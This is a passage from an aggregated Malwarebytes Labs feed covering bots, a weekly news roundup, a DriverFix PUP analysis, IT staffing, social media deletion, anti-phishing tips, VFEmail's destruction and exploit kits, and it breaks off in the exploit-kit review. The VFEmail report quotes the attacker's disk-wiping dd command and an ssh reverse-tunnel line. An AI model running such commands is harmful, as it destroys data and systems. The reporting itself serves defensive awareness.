For example, search engine crawlers help us to flesh out search engines. If they didn’t do their job and do it well, you might never actually find the thing you were looking for. Search engine crawler stagnation essentially equals the same for your website—stagnation, marooned on an island of “doesn’t live here.” There are some cases where website owners may not want to be crawled, and they can block bot access via the Robots Exclusion Standard.

Robots.txt is a file you can place in your website directory to prevent specific content from being scraped. Essentially, the Robots.txt is itself a form of (ro)bot, politely turning visitors away. Want a specific example? Many people don’t want old versions of their websites recorded for all time. As a result, they may include a line in Robots to exclude Internet Archive to come calling and scrape the content.

Where this method often goes wrong is that the polite turn away is exactly that—too polite.

Rules: meant to be broken

When the bad bots show up, they’re likely to ignore the “we’re full, sorry” notice and just throw a chair through the window. In fact, some security people will suggest not bothering with a Robots.txt at all. The theory is that some rogue entities will deliberately look for it, and then immediately go poking around all the site portions the owner wanted to hide.

“Wait, which bots are the bad bots creeping around the Internet?!” I hear you cry. Well, there’s a lot of them and poor old Robots.txt file probably won’t be much help here. One of the best ways to tell a bad bot from a good one is to examine its behavior. Bad bot behavior includes:

  • Brute force login attempts
  • Content scraping to steal or mirror content
  • Probing for hidden areas
  • Overloading the website with traffic
  • Vulnerability hunting: looking to exploit outdated apps, plugins, or content management systems

Even if you think your website is up-to-date, the server it runs on may not be, which means the bot issue is likely out of your hands. There’s a lot to contend with for a website admin.

Not all is lost, however. You can make use of a variety of scanning tools to mimic bot behaviour and see which form of bad bottery you’re most susceptible to. At that point, you can apply the correct fix as required.

Good, bad, or somewhere in-between

For some people, lines may blur a little between good bots versus bad ones. The most basic of interactions can produce all manner of knock on effects. For example:

Imagine your site is attacked by a content scraper, and all your hard work ends up on a cut and paste merchant’s website. Not cool. You then sign up to a copyright detection bot service, which crawls the web in search of your pilfered text. The scammer running the site has a block in its robots.txt file explicitly requesting the copyright sniffer not to come knocking. At this point, the bot is fully justified in avoiding the polite request to go in, scan the text, then report back to base that someone’s been up to no good. Your bot is now breaking the rules, and you’re tainted with justified wrongdoing forever.

Beating the system

Additionally, search engines can be gamed. SEO poisoning, where rogue links are included in results, was a problem for a long time before major providers started clamping down (with variable success). Even so, there are variations on these attempts. And outside of those, you still have the threat of compromised sites giving bad portals a boost.

If your organisation intends to deploy a web-scraping bot of its own, you may want to keep some of these developments in mind. It’s a fine line between helpful and nuisance, and not all rival bots play nice. It only takes a few mishaps with another org’s service or website, and you’ve got a major PR issue to deal with.

Time for a chat?

Chatbots have been around for a long time. The first was ELIZA, created in 1966 by Joseph Weizenbaum. While he considered ELIZA to highlight the superficiality of human/computer interaction, he was surprised at people attributing human emotions to the dialogue. Wind forward a couple of decades, and you have Roman Mazurenko turned into a chatbot for friends and family to interact with after his tragic early death. Years later, the same questions are being asked in terms of where the line is drawn, and whether such interactions are even healthy.

Many people think of chatbots (at least the good ones) as a recent development. However, chatbots have been used for some time for nefarious purposes—the first thing that springs to mind is pornography spam bots asking for credit card details. Quite often, that association is accompanied by thoughts of of malware and other shenanigans. Spreading out from forums and old-style chatrooms/IRC to instant messaging platforms and social media, bots have improved in their ability to actually help, instead of pilfer data or infect machines.

Often sporting limited phrases and becoming the butt of endless “look at me fool this spam bot” jokes, many businesses didn’t bother to invest in bots because the technology wasn’t there. Nowadays, you’ll find decent bot assistance for everything from shopping portals and banking to utility service providers.

Healthy living

Even Microsoft are in on the action at this point, with their Microsoft Healthcare Bot. This allows providers to customise their own AI-driven bot solution and roll it out to customers and clients. Elsewhere, chat-centric health bots are clearly seen as the future of medical assistance, with everything from therapy to simple daily reminders to take your pills. This view may be a little optimistic, as the potential for incorrect diagnosis or faulty advice is there. Integration with household IoT devices known to occasionally glitch out could increase that possibility. However, this is a clear use-case for mostly maligned bot technology as a force for good.

Fun for all the family?

Chatbots for children/teens are also a big thing now. Many of them are integrated with Facebook messenger, and will allow them to talk some Hearthstone, Marvel, or (for the older bot fans) converse with an AI replica of a dead horror movie character.

Ad fraud

Ad fraud is something that seems to have been around as long as ads themselves. Bots automate the process of clicking ads to provide a bump in income for the person who placed the ad. The more clicks, the more revenue generated. This is most commonly accomplished by infecting as many PCs as possible, then using those PCs to click ads.

There’s been many ad fraud trends over the years. One of the biggest I can remember is the rush to profit from high pay-outs on the word “Mesothelioma,” a rare form of cancer related to asbestos. For this, websites hijacked IE users, infected their PCs, and used instant messaging to send bad links while opening the ads in the unaware user’s browser.

Quite sophisticated, and apart from scale and profit, nothing much has changed. Ad fraud is entirely harmful, and often goes hand-in-hand with malvertising and ransomware attacks. These bots were designed to do bad, and they are accomplishing what they were meant to do.

Snipers in commerce land

Let the bidding wars begin! Automated commerce tools are pretty cut and dry. Not everyone wants web pages crawling, but you aren’t really going to lose out to someone in direct competition. Company X may use chatbots and your business doesn’t, but some customers will prefer the human touch and vice-versa. It isn’t going to make or break anything, particularly.

Where sales are concerned though, it’s pretty black and white. Where cash is involved, anything can happen and usually does. It’s a long time since scammers used bots to “buy” from other bots and bump up fake reputations, and that was quickly replaced in popularity by sniper tools.

Sniping tools have been around for a long time, and are somewhat controversial in seller circles. The basic idea is to give the sniper tool access to your eBay account (or any other bidding service), and at the very last moment before a sale ends, it’ll throw in your bid. Rivals are unable to counter because there’s nothing they can do about an automated service working to nanoseconds instead of a human hammering at a keyboard. So is this bad? For the other users, yes. For eBay as a platform, absolutely. Overall? Remains to be seen.

Fending off the bad bidders

Fixed price sales are a bidding bot’s worst enemy, because there’s nothing to gamble. Take it or leave it at the listed price. Some sites will offer a time extension if a last minute bid comes in, which may or may not help ward off the snipers. One of the biggest drawbacks to sniping is you often must hand over login details to the sniping tool. Do you trust it? Is it safe? Can the people who operate the service see your credentials? All of this and more are natural drawbacks to sniping, and could keep your business on top of those grabbing all the best items.

In the digital space of non-tangible goods, bidding and trading also reigns supreme. Sadly, it comes with major risks. Steam, the video game platform juggernaut, offers its own marketplace. There, you can buy all manner of in-game items, cosmetics, game cards, and so on. Some of these items sell for pennies and cents, others fetch hundreds of pounds and dollars.

A short-lived victory

One enterprising individual made a trading bot for the Steam marketplace, and spent some time  buying low and selling high across three separate Steam accounts. Ultimately, they amassed game items worth $10,000, which included 2,261 Team Fortress 2 keys.

Valve discovered the botting antics, and subsequently banned all accounts and deleted all the items. Yes, all ten thousand dollars’ worth. This is a clear case of gaming the system and would have also arguably impacted others. While this may have caused a few people to grab some items at a lower price, overall, it’s tough to call this one an example of a good bot (except maybe for the creator).

Bots by any other name

Most of our examples are essentially quite crude bots, living out their days simply sniffing the web or making the occasional product bid. There’s a big push for bots on your devices instead of scouring the web, mostly in the form of personal digital assistants. To a large degree, any regular mobile device does a lot of this anyway (Ahem, hi Siri!). Personalising said tasks and wrapping them up under a friendly interface is the name of the game.

As with other bot types, much of the information you’ll come across online is aimed at the bad stuff. That’s fine—it’s usually easier to spot things getting up to no good than invisible processes ticking along in the background harming nobody. Even so, plugging “mobile bots” into Google brings back nothing but bad bots, mobile game hijacks, scams, and more bad stuff. There are a few hints as to how this new realm of bot may play out as a force for good, including some outside of the mobile world, that illustrate the positive directions botting could move in.

While the word “bot” may never quite shake its negative associations, it’s absolutely worth revisiting and re-evaluating the next time your work colleagues mention a cool new bot program they’ve been assigned. Who knows, you may even give them some helpful suggestions to get the ball rolling.

The post Good bots, bad bots: friend or foe? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (February 11 – 17)

Malwarebytes - Mon, 02/18/2019 - 16:30

Last week on Malwarebytes Labs we discussed the return of the Sextortion Bitcoin scams, we gave you an early overview of the exploit kits in the winter of 2019, we talked about the destruction of VFEmail service, for consumers we discussed whether you should remove yourself from social media, for businesses we discussed the implementation of an anti-phishing plan, and the concept of whole team security to relieve overworked IT departments.

  • Security researchers have found that Intel’s Software Guard Extensions (SGX) don’t live up to their name. In fact they can be used to hide pieces of malware that silently masquerade as normal applications. (Source: The Register)
  • A targeted phishing campaign is underway that states your email has been blacklisted and then asks you to confirm it by entering your credentials. For some reason, this campaign is using phishing links that can contain almost 1,000 characters. (Source: BleepingComputer)
  • Malicious actors have been hacking WordPress websites by exploiting vulnerabilities in a fairly popular plugin called WP Cost Estimation & Payment Forms Builder. Developed by Loopus, the plugin allows WordPress website administrators to create cost calculators and payment forms. (Source: SecurityWeek)
  • The Emotet Trojan, a thorn in the side of financial institutions and your average individual alike, is back with new techniques and an upsurge in attacks. In recent campaigns malicious documents containing Emotet are being distributed via URLs hosted on threat actor-owned infrastructure as well as traditional spam email attachments. (Source: ZDNet)
  • In the weeks leading up to Valentine’s Day 2019, researchers notice a new form of Gandcrab appearing in romance-themed emails. Hackers love the holidays, and Valentine’s Day is no exception. (Source: DarkReading)
  • New research published by the International Computer Science Institute in California suggests that at least 17,000 Android applications are creating permanent records of your online activity for advertising purposes even when you ask for such information to be forgotten. (Source: ZDNet)
  • Microsoft booted eight malicious apps from its official desktop and mobile app store after researchers found the programs surreptitiously mined for Monero cryptocurrency. All these apps were likely developed by the same person or group. (Source: ThreatPost)
  • A new phishing attack bent on stealing Facebook credentials has been spotted – and it’s turning researchers’ heads due to how well it hides its malicious intent. The status bar, navigation bar, shadows and content were perfectly reproduced to look exactly like a legitimate login prompt. (Source: ThreatPost)
  • Jeff Bezos became the most famous and powerful person to claim to be a victim of sextortion, the term often used to describe the otherwise underreported cases of extortion using intimate or sexually explicit photographs or videos. (Source: Wired)
  • Malta’s leading bank resumes operations after cyberheist-induced shutdown. The Bank of Valetta, which went dark for a day after the fraudulent transfers of €13 million, is now looking to get the money back. (Source: WeLiveSecurity)

Stay safe, everyone!

The post A week in security (February 11 – 17) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Crack hunting: not all it’s cracked up to be

Malwarebytes - Mon, 02/18/2019 - 16:00

People sometimes ask us in the forums if a keygen or software crack is safe to use. Sometimes, these programs do what they say on the tin. Other times, they’re not what they say they are. In this post, I’ll describe what happened when I went crack hunting, and why it is often unsafe to carry out this activity.

Researchers like myself often browse crack and keygen sites because they are known to host many affiliate links to third-party applications, many of which include Potentially Unwanted Programs (PUPs), adware, or worse. Many of these sites also host downloads for malware.

These sources are important to research because users often browse crack and keygen sites looking to find paid software for free. This is risky practice, though, because the user may end up downloading unwanted software that can do more harm than good.

In this case, I was looking for a crack for Windows 10 Pro, since it’s popular software. The crack download itself was actually not a crack, but a file we detect as PUP.Optional.InstallCore.Generic. This “crack” did not run properly on my test machine, most likely because of sandbox sensitivity.

While the “crack” was being downloaded, the download page redirected to a page advertising DriverFix. The advertisement is one of many adverts offered by ad rotators.

I clicked on the link, which in turn opened the following site:

Clicking the “download now” button downloaded the file from the DriverFix site and delivered basic instructions on how to get the program to run.

According to the website, DriverFix is a Windows application that scans your machine to find outdated drivers, and allows users to update those drivers from within the application with one click. So I tried it.

Once the software was installed, it automatically launched, ran a scan, and displayed the results of the scan. Here are results from two different machines. Notice the results show drivers as being “Extremely old.”

This gives users false ideas that their machine has issues that must be fixed. When I expanded the info for my batteries and checked it, indeed there are newer drivers available, though calling my drivers “extremely old” is a bit of a fallacy.

When the user attempts to “update all” or update one driver, they are presented with a pricing page to pay for the services to update their drivers.

The user then has the choice to update one driver, update all drivers on their system, or purchase the “family pack,” which will update as many as three PCs. Many users will opt-out of purchasing the services at this point.

This is where things get hairy. One does not have to buy new drivers. In my case, all I did was Google the driver description “Microsoft ACPI-compliant control method battery driver Windows 10” and found results right from the Microsoft Update Catalog site.

If this proves to be difficult for the not-so-tech-savvy folk, you can also open Device Manager, expand the driver in question, open the Driver tab, and click “Update Driver.” Microsoft will download the driver your system needs at no cost. Plus, you can be sure it is coming from Microsoft.

If the user decides not to purchase and simply closes DriverFix, eventually they end up with warning messages from DriverFix regarding their outdated drivers when they do anything on their machine that uses the drivers flagged in the initial scan. Below is the notification I received from DriverFix when I was saving a file to my machine.

This is not typical behavior from benign software. This behavior is designed to scare the user into thinking they have severe issues that will only be solved by purchasing services from DriverFix.

This is after the user might have thought they were getting a free product that promised to fix driver issues in one click when they ran into the initial advertisement.

Unless your machine is very old, Microsoft provides compatible drivers, or the computer manufacturer automatically provides driver updates through its own built-in software at no cost.

Between discovery of this program on December 19, 2018 and January 9, 2019, the installer for this product has been detected 3,245 times by Malwarebytes. There have also been 839 reported traces detected as a result of installs during the same time frame.

Malwarebytes blocks the website that hosts DriverFix downloads, and stops the application installer from launching.

We detect the application as PUP.Optional.DriverFix.

If you installed DriverFix, we have instructions on how to remove it or how to add exclusions if you decide to keep it.

As long as sites continue to try pushing cracked software that seem too good to be true (and thus, is actually harmful to users), we will continue to detect such programs in order to protect our customers.

And for those looking for the silver bullet software in crack or keygen sites, we suggest making sure you can spot benign programs from those that try to squeeze a few bucks out of unsuspecting users. Exploring these sites is not for the uninitiated—best to stick to tried and true, legitimate versions of software programs instead of risking illegal crack or keygen sites and programs.

The post Crack hunting: not all it’s cracked up to be appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Tackling the shortage in skilled IT staff: whole team security

Malwarebytes - Fri, 02/15/2019 - 16:40

Is your IT department understaffed, overworked, and are you looking for reinforcements in vain? Maybe these hard-to-hire reinforcements can be hired from within, rather than having to outsource or hire expensive, short-term extra help. While this was usually only done if your own staff was falling too far behind, the burden of the shortage of skilled IT staff in the workforce is starting to take its toll, and this is now be a viable option for all.

Undoubtedly, there is a person in every group who is more computer-savvy than others. The one who can end your problem or answer your question in seconds, when it would take hours, if not days, to get someone from the IT department to look at it. These people shield the IT department from several questions each day, and keep frustrated endpoint users at bay that had given up asking the overwhelmed crew for help and assistance.

Nevertheless, professionals often frown upon the help given by these helpful troubleshooters on the floor level. How can we ensure that the help given by these often self-appointed volunteers is nothing short of the first-tier support provided by the IT department?

Pros and cons

First of all, make sure that your IT staff is willing to share their responsibilities with people on the work floor. Without their full cooperation, this plan is destined to fail. We can all agree that trained and weathered IT professionals will generally do a much better job than people who have been trained for other jobs. But if you are facing the same problem as most companies and you just can’t hire enough IT professionals, you will probably welcome all the help you can get. And having to rely on a frustrated and overworked IT staff might be worse than letting volunteers that feel recognized and empowered help in any way they can.

On the other hand, in “any way they can” might be just turn out to be the problem with this solution. It should be made crystal clear when the volunteers are expected to call in the help of the professionals. You do not want to face some catastrophe because one of the benevolent volunteers Googled a half-baked solution for a problem that was reported to them.

This whole team security strategy fits nicely in the ongoing shift to BYOD, and even Bring Your Own Security (BYOS). Generally speaking, it will make your employees happier, but it takes some planning and attention to make sure it also works for the company as a whole.

BYOD strategy

One important thing to consider is whether the company has adapted a user-centric or device-centric approach to technology integration. If every user is equipped with a device according to their personal preference, there could be a multitude of devices in use. This can be frustrating enough for a trained professional to deal with, let alone a volunteer who is about to find out that everything works just a little bit differently on their colleagues’ devices.

Determine at the outset the composition of your technology and workforce, and you can better structure a plan for your volunteers—and your IT staff, too.

Education and training

Training your entire staff in security basics will certainly result in less work for your IT staff. And while providing your employees with security awareness training is a good and necessary start, you can bolster support for your IT team by offering additional IT and security training to those who are interested. There are lots of useful training programs that deal with common issues found in the software that your employees are using on a daily basis. And if the trainee is motivated and interested (as we would expect from these volunteers), it shouldn’t take up a large amount of their time.

In addition to training, you’ll also want to set up a system of rewards for your volunteers, whether that’s monetary compensation, company swag (for example, custom hoodies designating them as IT helpers), or other perks. While many volunteers may be happy to help out of the goodness of their hearts, given them additional incentive will only strengthen their commitment and attract others to the team.


Once the volunteers have received proper awareness training, equip them with the tools and authority to help their peers and make sure the rest of their department knows that they have been properly trained and can be asked for help with certain issues. This way, the people in that department are comfortable with asking for their help and will know when they can go to them instead of IT.

What this means: Volunteers will need access to certain software, systems, or cloud-based services. They’ll also need a way to communicate their actions to the IT team, so they’re aware of minor issues, even if they didn’t have to fix them themselves. Do they develop a ticketing system? Do they integrate with the current system for reporting issues? Do they spend an hour at the help desk?

No matter how you decide to enable your volunteer staff, make sure that they understand the consequences of their actions. Don’t tell them to “just do this” without explaining why you want it done that way. Give them some background so they can build out their expertise and learn how you want to run things.


Another important step is to give volunteers the administrative powers to make the actual changes themselves. With the ongoing uptick in Bring Your Own Device (BYOD) policies, most of these users have learned how to make the necessary changes to their own devices, and how to troubleshoot some of the more common issues. They may even have some specialists outside of the company that they turn to when there are problems with the device that they consider their own.

One caveat: Make sure that the volunteer is informed about the risks of combining work and personal information on the same device—and what the consequences are if they don’t adhere to company policies. As always, clear communication is a key to success. Make sure everyone is aware of what is expected of them, and what they can expect in return.

Points of attention

Finding the right people to assist your IT staff with easy-to-fix issues or simple roll-outs can make your employees happier. The IT staff can concentrate on problems that are more challenging and don’t have to run around like headless chicken playing whack-a-mole for every minor problem, like users who just need to reboot, haven’t turned on the power, or are holding the mouse upside-down. Meanwhile, your volunteers will feel that their helpful attitude has paid off, and they are now officially allowed to help their peers.

The volunteers will need the training, tools, permission, and rewards to perform their new tasks. But, and we cannot stress this enough, they will also have to be informed about their boundaries. You don’t want to see them go overboard because they are reluctant to admit that something is over their head. Remember that difficult problems may show up as minor issues at first. So empower them to help, but make sure they know when to step aside. That way, the whole team can keep your organization secure.

The post Tackling the shortage in skilled IT staff: whole team security appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Should you delete yourself from social media?

Malwarebytes - Thu, 02/14/2019 - 17:30

You’re feeling like you’ve had enough. All the recent news—from Facebook’s Cambridge Analytica snafu to various abuses of Twitter vulnerabilities—has you wondering: Should I delete myself from social media?

Social networking does have its positive aspects. You can stay in touch with distant (or not) relatives, be included in the planning of social events within your circle of friends, get real-time updates on regional and national news, and promote your company, content, or other personal ventures. Plus, you get to experience all the cool memes a full two weeks after they’ve been posted on Reddit.

Then again, there are quite a few reasons—spanning security, privacy, and overall shady business practices—for leaving. In 2018 alone, Facebook experienced a security breach that impacted 50 million accounts, was responsible for a genocide incited using its platform, kept user data it said it deleted, and was caught abusing Apple development apps to test on children. Twitter, meanwhile, has not only been at the butt end of password bugs, hacks, and data breaches, but some could say these days is a general dumpster fire of bot accounts.

Instagram and Snapchat are not without their flaws, either. Hackers are targeting influencer accounts on Insta, while Snapchat has been the recipient of phishing attacks and security breaches.

Unfortunately, we can’t make the decision to quit social media for you. Instead, we recommend you make a list of pros and cons. Consider what data might be lost. Consider what time and peace of mind might be gained. Weigh the rewards against the risks. If you come away feeling ready to take a step back, but not quite quit cold turkey, we can help you with ways to tighten security and privacy settings. And if that’s not enough, we’ll show you how to delete your accounts.

Let’s start slowly

If you’re not quite ready to cut the chord, a good option for cooling down on social media is to adjust the privacy settings on all of your accounts. This is a sensible thing to do, even if you aren’t considering leaving. It also has the bonus side effect of increasing awareness of just how much you share on social media.

In a previous blog, we discussed how to secure your social media profiles in great detail. We recommend users who aren’t deleting themselves read this first to understand the intricacies. Next, here’s a quick and dirty list of links to follow in order to adjust privacy settings across the top four social networking platforms:

After adjusting the settings, it’s a good idea to monitor and track your social media usage moving forward, either for the purpose of time management, focus, or beating social media addiction. As more and more of our media consumption moves to smart phones, you can leverage several apps that will help you achieve these goals. These include:

Goodbye, top four!

Let’s say you sat down, had a good think, and decided that it’s time to move on from social media. You can begin by collecting the appropriate links. Below, we’ve included links to download your data from the most popular platforms. You should download your personal information from these social networking sites prior to the nuclear option, should you experience remorse. Plus, it’s a real eye opener to find out exactly how much data you generate and share on social networking platforms.


Time to permanent deletion: Once 14 days have passed, your deletion request will be started. This can take upwards of 90 days to complete.


Time to permanent deletion: It takes up to 30 days for Twitter to completely delete your account.


Time to permanent deletion: Immediately!


Time to permanent deletion: 30 days


Ha ha ha, ho ho ho, he he he he. This one is mostly for the giggles. Google will abandon this particular endeavor on April 2, 2019. But if you feel the need to delete yourself before then, here’s what to do:

The right time

Security researchers love social media platforms. They’re a vast source of open-source intelligence (OSINT) and help us make attribution possible (provided your adversary has poor OPSEC). However, the reasons we enjoy social media may also be the reasons why regular consumers should take a beat and consider the benefits.

When you’re ready to make a decision, we’ve given you all the necessary links to back up and delete these accounts, as well as some material that may help you decide which ones to keep, and how to properly secure them.

If social media is causing anxiety, stress, or depression; if you’re tired of your data being mined and shared with third parties; if it’s starting to feel more like work to maintain instead of pleasure, then it may be time to shore up defenses and take a break, or even step away for good. And if that time comes, we’re here for you.

The post Should you delete yourself from social media? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Hacker destroys VFEmail service, wipes backups

Malwarebytes - Thu, 02/14/2019 - 16:56

An email service called VFEmail was essentially put out of business after a hack intended to delete everything in (and out of) sight.

“Yes, @VFEmail is effectively gone. It will likely not return. I never thought anyone would care about my labor of love so much that they’d want to completely and thoroughly destroy it.”

This wasn’t “just” a simple webpage compromise, or some sort of database dump. In fact, it was something altogether quite worse. Put simply, the total annihilation of a service and most, if not all, of its infrastructure.

What happened?

Users of VFEmail woke to the following message on the service’s website:

Click to enlarge

!!!ALERT!!!! Update Feb 11 2019

vfemail(dot)net and mail(dot)vfemail(dot)net are currently unavailable.

We have suffered catastrophic destruction at the hands of a hacker, last seen as aktv[redacted]

This person has destroyed all data in the US, both primary and backup systems. We are working to recover what data we can.

New updates 2/11/19 6pm CST:

Incoming mail is now being delivered.

Webmail is up. Note-mailboxes are created upon new mail delivery. If you cannot login, you may not have received mail.

Mailboxes are new, no subfolders exist.

No filters are in place. If you created a filter with Horde, Login to Horde, Create any folders you need. 

Click Filter, Click Script, then click ‘Activate Script’.

There is no spam scanning at this time – Incoming mail may be Spam scanned depending on DNS status.

Free users should not attempt to send email, there is currently no delivery mechanism for free accounts. Paid accounts should be useable, including Horde/Roundcube contacts and calendars.

At this time I am unsure of the status of existing mail for US users. If you have your own email client, DO NOT TRY TO MAKE IT WORK.

If you reconnect your client to your new mailbox, all your local mail will be lost.


Did they put word out on social media?

You bet they did, and the Tweets don’t make for pleasant reading:

This is not looking good. All externally facing systems, of differing OS's and remote authentication, in multiple data centers are down.

— (@VFEmail) February 11, 2019

Caught the perp in the middle of formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@ -R -N

— (@VFEmail) February 11, 2019

It may sound a bit exciting to walk in on the scene of the crime, but I can assure you it’d only involve lots of “oh no” types of expression. If they’re already wiping your backups, the game is indeed over.

Did they recover?

Sadly things didn’t improve, and a few hours later the full damage report was available:

At this time, the attacker has formatted all the disks on every server. Every VM is lost. Every file server is lost, every backup server is lost. NL was 100% hosted with a vastly smaller dataset. NL backups by the provideer were intact, and service should be up there.

— (@VFEmail) February 11, 2019

All data was encrypted at least, but said data basically vanished into thin air when it was scrubbed:

Yep, but it doesn't matter. They just formatted everything.

— (@VFEmail) February 11, 2019

They also managed to destroy various VMs using different forms of authentication.

Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy.

— (@VFEmail) February 11, 2019

“Just attack and destroy”

Services and sites have been attacked severely in the past, some to the point of destruction. However, there’s almost always an overt reason given, or a ransom, or some other clue.

Here, it’s nothing but complete devastation and a service in existence since 2001 absolutely ruined in the bargain. There’s no indication as to how they got in, or if an important system had no multi-factor authentication. A number of commentators have suggested this flaw may have been a way in for the attacker.

Until detailed analysis is published, it’s hard to say why this happened. Did the owner of the service aggravate a talented hacker? Or could one of the service users have drawn attention from unwanted sources, and this is the end result? It’ll be fascinating to find out. But if you operate a similar service, you may wish to consider a decent offline backup system in the meantime.

The post Hacker destroys VFEmail service, wipes backups appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Businesses: It’s time to implement an anti-phishing plan

Malwarebytes - Wed, 02/13/2019 - 16:54

Businesses: phishers aren’t just coming for you. They’re coming for your employees and your customers, too.

Phishing attacks are on the rise this year, thanks in part to massive Emotet and TrickBot campaigns, which make use of phishing emails to deliver their payloads. If you don’t already have one in place, then it’s time to implement an anti-phishing plan.

Where phishes are concerned, it doesn’t matter if the technique being used is revolutionary or old hat. Somebody, somewhere is going to fall for it. It’s up to you and your employees to ensure that your business is secure, and that your customers are performing safe email practices, too.

If your customers are logging into fake portals, eventually they’re going to tie up your support channels asking for help, refunds, reorders, and more. If your employees are being stung, they open the door to data theft, network infiltration, ransom demands, spying, and a massive dent in your company’s reputation to boot.

All of these are poor directions to head in. So let’s first take a look at some of the targets of phishing campaigns. Then, we’ll talk about what your employees and customers can do to identify a phish.

Targets for phishers

The 2018 Phishing Trends & Intelligence Report (PDF) from PhishLabs stated that Email/Online Services were the top targeted industry in the second half of 2017 by a margin of 26.1 percent, with a high concentration of phishing URLs mimicking Microsoft Office 365 login pages.

Office 365 is enormously popular for businesses, with Microsoft revealing in 2016 that is has:

  • 60 million active commercial customers
  • 50,000 small business customers added every month
  • 340 million downloads of its mobile app

As our 2019 State of Malware report shows, there’s no real sector of industry left alone by malware attackers. Trojans (which include Emotet and TrickBot) lured in targets in manufacturing, education, and retail in 2018 with phishing emails. And ransomware, which is also a popular payload of phishing attacks, crippled organizations in government, as well as education, manufacturing, retail.

Outside of those verticals, however, phishers know that every business is sitting on something juicy: personally identifiable information (PII). Just about any organization in any vertical is sitting on databases of customer names, emails, and their payment details.

That’s a huge number of potential targets at which to aim.

What should we do?

While it’s nearly impossible to predict every threat model, or what an attacker may want with your company’s data, you can better thwart phishing attacks by putting in place a clear anti-phishing plan. There’s never been a better time to start beefing up your cybersecurity policy for employees, as well as update your website with solid anti-phishing tips for your customers.

If you’re short of a few ideas on how to help your employees and customers identify phishing attempts, we have a handy introductory list below.

Anti-phishing tips for your employees
  1. Attachments aren’t always a guarantee of malware. Often, phishers will send perfectly clean files as an additional confidence trick. “Please fill this in and send it back,” they’ll say. Having said that, many phish campaigns will happily try to backdoor a network with a rogue file alongside a phish attempt. When in doubt, do not open the file. Instead, try to contact someone you know from the organization listed in the email to confirm.
  2. Mobile devices are particularly at risk from lengthy scam URLs, as the visible portion may be tailored to appear legitimate, but the rest of it—which would give the game away—is hidden offscreen. Employees checking email on their phones or browsing the Internet should always review the whole URL before clicking. If it looks suspicious, or uses numbers or peculiar letters in place of what you’d expect to be there, it’s best to leave immediately.
  3. Dubious apps are also a potential problem, so it’s best to review apps you plan to install on your work mobile device or desktop with a hawk eye. Are the logos the same? Does the user experience match what you’d expect?
  4. Promoted content on social media can lead to phishing, and it’s worth advising all employees and customers to be wary of this—especially as ads tend to be targeted to your interests (thanks, trackers). While you may not want to prohibit use of social media at work entirely (especially as it’s part of the job for many folks in marketing), recommending that users not engage on social media from work devices, or limiting their engagements to work-specific tasks, could help thwart phishing attempts.
  5. Bit of a niche one, but you may wish to advise employees not to waste spammer’s/phisher’s time with any of these tactics during work hours. Using personal accounts is all fun and games, but replying with anything work-related could go terribly wrong. The bad guys know your work mail exists for one thing, and they’ll either spam it hard, send you more junk, or go after your business even more than they were already.
Anti-phishing tips for your customers
  1. Look at some anti-phish pages from the biggest brands. You’ll notice that they all mention the most obvious forms of attack. If you’re eBay, you’re going to see customers sent fake auction missives, or “problem with your auction” attacks. If you’re Steam, it’ll be “problems with your marketplace item” or free game keys. A bank? it’ll be bogus re-authentication mails. For Apple, it’ll be issues with pending refunds for items they don’t remember purchasing. This is how you should lead the charge.
  2. Point out that the presence of a padlock isn’t a guarantee the site they’re on is real. Certificates for websites are easily obtained for free these days, and scammers are taking full advantage of it. It may have been useful to tell people “Avoid sites with no padlock because it isn’t real” years ago, but the game has changed and so must our messaging.
  3. Warn them about bad spelling, errors in formatting, and email addresses in the “From” field which look suspicious. Also mention that many phishers spoof mails in the “From” field so this isn’t a guarantee of safety either. Perhaps the formatting and design are different from what you usually receive from an organization. Maybe the logo looks pixelated or the buttons are different colors. The possibilities are endless.
  4. Desperation is a surefire sign that something may be wrong. It’s panic buying, but not as we know it. Emails claiming a tight time limit to login and perform an action, alongside the threat of losing X or Y forever, is a good sign of bad things afoot.
  5. Warn them off emails asking for additional personal information (and if your organization sends such emails, try to wean yourself off this practice, too). Links to sites asking for logins is bad practice. Train your customers and employees out of this habit. If they won’t click links asking for information, the battle is halfway won.
  6. The URL shown on the email and the URL that displays when you hover over the link are different from one another. An oldie, but goodie.
My business uses Office365, what else can I do?

Microsoft has a handy list of security suggestions for you to deploy on your network. Suggestions include:

And finally

Google has come up with a short, fun, and difficult anti-phishing test. It’s a fantastic way to experience some common phishing techniques safely. There aren’t many ways to experience real phishing examples in a safe environment, so it’s well worth having a go. You’ll likely find that there’s a few tactics in there you haven’t seen before, and it’s always a good idea to test your employees on some left-field phishing techniques. However you choose to go about putting together an anti-phishing plan for your organization, we wish you many years of safe emailing ahead.

The post Businesses: It’s time to implement an anti-phishing plan appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Exploit kits: winter 2019 review

Malwarebytes - Tue, 02/12/2019 - 16:00

Active malvertising campaigns in December and the new year have kept exploit kit activity from hibernating in winter 2019. We mostly observed Fallout and RIG with the occasional, limited GrandSoft appearance for wider geo-targeting.

In addition, narrowly-focused exploit kits such as Magnitude, Underminer, and GreenFlash Sundown stayed on the same track: delivering ransomware to mostly Asian countries, and South Korea in particular.

Winter 2019 overview
  • Fallout EK
  • RIG EK
  • GrandSoft EK
  • Magnitude EK
  • Underminer EK
  • GreenFlash Sundown EK

Internet Explorer’s CVE-2018-8174 and Flash’s CVE-2018-4878 continue to be the most common vulnerabilities across the board, even though a couple exploit kits have now integrated the newer Flash CVE-2018-15982.

Fallout EK

Fallout keeps bringing fresh air into an otherwise stale atmosphere by introducing new features and even adopting newer vulnerabilities. It also appears to be a good experimental framework for some actors who have customized the payload delivery. Fallout was the second exploit kit to add CVE-2018-15982, a more recent vulnerability for the Flash Player.


Good old RIG is still kicking around, but has taken a back seat to the newer Fallout in many of the malvertising chains we track, except perhaps for Fobos. There haven’t been any notable changes to report since we last reviewed it.

GrandSoft EK

GrandSoft and its Ramnit payload still go hand-in-hand via limited distribution tied to compromised websites. It is perhaps one of the least sophisticated exploit kits on the market right now.

Magnitude EK

